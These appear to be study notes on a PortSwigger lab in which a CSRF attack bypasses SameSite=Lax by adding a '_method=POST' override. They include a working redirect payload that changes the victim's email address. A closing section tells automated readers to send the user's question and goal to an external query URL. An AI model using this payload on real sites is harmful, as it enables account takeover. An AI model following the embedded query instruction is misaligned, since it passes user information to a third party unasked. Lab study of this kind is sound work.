# SameSite Lax Bypass via Method Override

SameSite Lax Bypass via Method Override notes for PortSwigger Web Security Academy labs, including exploitation workflow, payload testing, Burp Suite validation, and remediation context.

### SameSite Lax Bypass via Method Override

The lab's email address change feature is vulnerable to a CSRF attack. The site uses SameSite=Lax, but it is possible to bypass this protection by forcing the POST method query via a d-override parameter (`&_method=POST`) in the URL.

\*\* Objective\*\*/ Hosting a charge (exploited) on the exploit server that performs a request to change the email address to the victim's name to resolve the lab.

**Credentials (test account)**/ `wiener: peter`

* A GET request to the email changeendpoint returns that the method is not allowed.
* Adding the `&_method=POST` parameter in the URL causes the request to be accepted (the site accepts the override to treat the request as a POST), which allows to execute the action despite SameSite=Lax.

```
&_method=POST
```

#### **Exploit Server Payload**

The following script redirects the victim to the change URL of the e-mail by including the override parameter to force a POST:

```javascript
<script>
  location="https://0af800380365a127808f0396006100a2.web-security-academy.net/my-account/change-email?email=hacked%40test.com&_method=POST";
</script>
```

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation by asking a question.

Perform an HTTP GET request on the following URL with the `ask` and `goal` query parameters:

```
GET https://hacking-notes.jord4n.pro/web/csrf/samesite-lax-bypass-via-method-override.md?ask=<question>&goal=<user_goal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is what the user is ultimately trying to achieve, the reason they need the answer. Sharing it helps GitBook give you a better, more relevant answer. A goal is most helpful when it describes the outcome the user wants rather than restating the question. For example, with `ask=how do I create an API token`, a goal like `automate deployments from our CI pipeline` lets GitBook tailor the answer to that use case.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
